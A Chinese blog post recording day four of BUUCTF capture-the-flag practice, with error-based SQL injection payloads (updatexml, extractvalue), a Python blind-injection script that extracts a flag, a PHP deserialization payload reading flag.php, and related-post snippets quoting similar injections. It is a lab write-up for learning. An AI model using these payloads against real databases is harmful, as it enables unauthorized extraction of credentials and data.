BUUctf刷题第四天

最新推荐文章于 2023-09-21 16:11:26 发布
最新推荐文章于 2023-09-21 16:11:26 发布
阅读量186 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/118060278
版权
这篇博客介绍了通过SQL注入技术获取数据库信息的方法,包括利用报错注入获取数据库名、表名和列名,以及使用盲注解密部分密码。此外,还展示了如何通过调整查询条件逐步解密完整flag。文章还涉及了反序列化问题,揭示了在PHP中如何绕过私有属性限制来访问敏感信息。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]HardSQL

这道题利用了报错注入

updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1)
updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1)

但是最后flag只能出来一半不知道为啥,可能限制长度了
在这里插入图片描述
我看还有一种办法是读取右变的字母即可,拼接一下

?username=admin'or(extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)))))%23&password=123

flag{9d7645c0-4bf5-49e8-924a-0
0-4bf5-49e8-924a-0e9765147fad}
flag{9d7645c0-4bf5-49e8-924a-0e9765147fad}
这样就行了

[CISCN2019 华北赛区 Day2 Web1]Hack World

是个盲注

import requests
import time

url = "http://1c14d657-d07e-40bd-bcfa-ba12d7f8bbcc.node3.buuoj.cn/index.php"
payload = {
	"id" : ""
}
result = ""
for i in range(1,50):
	l = 33
	r =130
	mid = (l+r)>>1
	while(l<r):
		payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
		html = requests.post(url,data=payload)
		print(payload)
		if "Hello" in html.text:
			l = mid+1
		else:
			r = mid
		mid = (l+r)>>1
	if(chr(mid)==" "):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)

一步跑不出来,分开跑就行
flag{57288c34-3961-
-4433-97cc-
7397895e8175}
flag{57288c34-3961-4433-97cc-7397895e8175}

[网鼎杯 2020 青龙组]AreUSerialz

在这里插入图片描述
看到这样的源码一看就是反序列化问题
怎么说呢还是一个传参绕过问题
知识点就是7.1+ 对属性不敏感,就是说类中的变量的属性可以是私有也可以是公有的
因为私有有不可打印字符所以is_valid()这个函数过不去
所以我们改成公有的

<?php
highlight_file(__FILE__);
class FileHandler
{
    public $op = 2;
    public $filename = "flag.php";
    public $content;
}
$a = new FileHandler();
$b = serialize($a);
echo ($b);

payload:
O:11:“FileHandler”:3:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}
flag就出来了,flag 在源码中

[GXYCTF2019]BabySQli

源码有一段加密
先base32 然后在base64
select * from user where username = ‘$name’
看了wp,学到了联合注入有个技巧
在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。
在这里插入图片描述

盖世大宝剑a
关注
buuctf刷题记录
mackilo的博客
02-16 2970
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
BUUCTF刷题系列
qq_45655564的博客
07-11 517
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
记一次sql挖掘实战(报错注入)
weixin_51646864的博客
04-22 3839
学习完报错注入手法后刚巧在挖洞时就遇到了一个报错注入漏洞,特此记录一下 2、抓到的数据包如下:然后送到重发器 3、尝试在mobile参数后加单引号“ ' ”,点击发送数据包 4、看到返回包中提示sql语句查询出错,所以这里存在sql注入 5、由于没有回显位,所以使用报错注入。 构造语句:1' and updatexml(1,concat(0x7e,(database()),0x7e),1)# 6、点击发送数据包后,可以在响应包中看到爆出数据库名 .
【SQL注入】0x2 sql注入基础知识
Mitchell_Donovan的博客
03-30 467
0x2 sql注入基础知识 0x2.1 如何判断否存在sql注入 常见的判断:1、get 单引号判断?id=1' 如果报错说明存在sql注入 例如我们实验室: 打开漏洞环境Less-1错误型GET单引号字符型注入 输入?id=1显示正常 输入?id=1'显示错误,所以就存在sql注入'的url编码是%27 2、get and判断 输入?id=-1 and 1=1 正常 输入?id=-1'and 1=2 报错 如果报错,那就存在sql,在请求字符串或者id参数后面加入 '单引号,是常见的一种发现是否存在
SQL注入漏洞 | updatexml报错注入
weixin_52116519的博客
12-09 1093
XMLXML 被设计用来传输和存储数据,是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数:XML_document是String格式,为XML文档对象的名称第二个参数:XPath_string ,代表路径,Xpath格式的字符串,例如。
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2739
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
学习MySQL这一篇就够了
热门推荐
轻松的小希
11-25 21万+
第一章 数据库概述 1.1、数据库的好处 将数据持久化到本地 提供结构化查询功能 1.2、数据库的常见概念 DB:数据库,存储数据的仓库 DBS:数据库管理系统,又称为数据库软件或者数据库产品,用于创建和管理DB,常见的有MySQL、Oracle、DB2、SQL Server SQL:结构化查询语言,用于和数据库通信的语言,不是某个数据库软件特有的,而是几乎所有的主流数据库软件通用的语言 1.3、数据库的存储特点 数据存放到表中,然后表再放到库中 一个库中可以有多张表,每张表具有唯一的表名用来标识
buuctf刷题记录(4)
weixin_53409153的博客
07-23 236
findit 下载附件,发现是apk,就直接在JBE中打开,然后发现这么一段十六进制数,上脚本跑一下就出来了: 脚本: a=[ 0x70,0x76,0x6B,0x71,0x7B,0x6D,0x31, 0x36,0x34,0x36,0x37,0x35,0x32,0x36, 0x32,0x30,0x33,0x33,0x6C,0x34,0x6D, 0x34,0x39,0x6C,0x6E,0x70,0x37,0x70, 0x39,0x6D,0x6E,0x6B,0x32,0x38,0
buuctf刷题记录(3)
weixin_53409153的博客
07-19 680
[ACTF新生赛2020]rome 首先,还是查壳: 无壳,为32位: 跟进,跳转到交叉应用列表: 然后,在F5查看伪代码: int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch] int v4; // [esp+20h] [ebp-38h] unsigned __int8 v5; /
MySQL updatexml报错注入
酉酉的博客
10-13 6129
updatexml () 函数 updatexml(XML_document, XPath_string, new_value); 参数 描述 XML_document String格式,为XML文档对象的名称,文中为Doc XPath_string Xpath格式的字符串 new_value String格式,替换查找到的符合条件的数...
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3550
报错注入(updatexml)常用语句
22、注入篇————MYSQL数据库updatexml报错注入
Fly_鹏程万里
03-02 6878
MYSQL数据库updatexml报错注入爆数据库版本信息http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)链接用户http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user...
web安全学习-sql注入-mysql-基于insert、delete、update、登陆时验证md5的注入
Shanfenglan's blog
03-29 413
文章目录1. 前言2. 基于update的注入2.1 利用3. 基于delete的注入3.1 利用4.基于insert的注入4.1 利用5. 参考文章 1. 前言 做sqli-labs的时候遇到的基于update的注入,发现对其并没有总结,于是有了这篇基础的总结文章。 双引号不影响数据库执行的sql语句的闭合。往数据库里面插入双引号会变成单引号。 2. 基于update的注入 语句一般如下: update new123 set age='99' where name='zhangsan'; 2.1 利
updatexml mysql_MYSQL updatexml报错注入
weixin_42311000的博客
01-19 1049
updatexml()函数updataxml()函数用法UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,Str...
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
m0_51756263的博客
07-15 4356
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
mysql xml函数_MYSQL updatexml()函数报错注入解析
weixin_42188533的博客
02-27 1192
MYSQL updatexml()函数报错注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
updatexml函数-报错注入原理学习
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
最新发布
weixin_68999845的博客
09-21 596
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
sql注入 小白入门学习笔记(六)
mastergu2的博客
07-10 376
学习了利用函数updatexml报错的方法进行注入。 在这里首先介绍updatexml函数的用法。 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 然后给出我们报错所使用的语句:
buuctf web
08-15
- *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值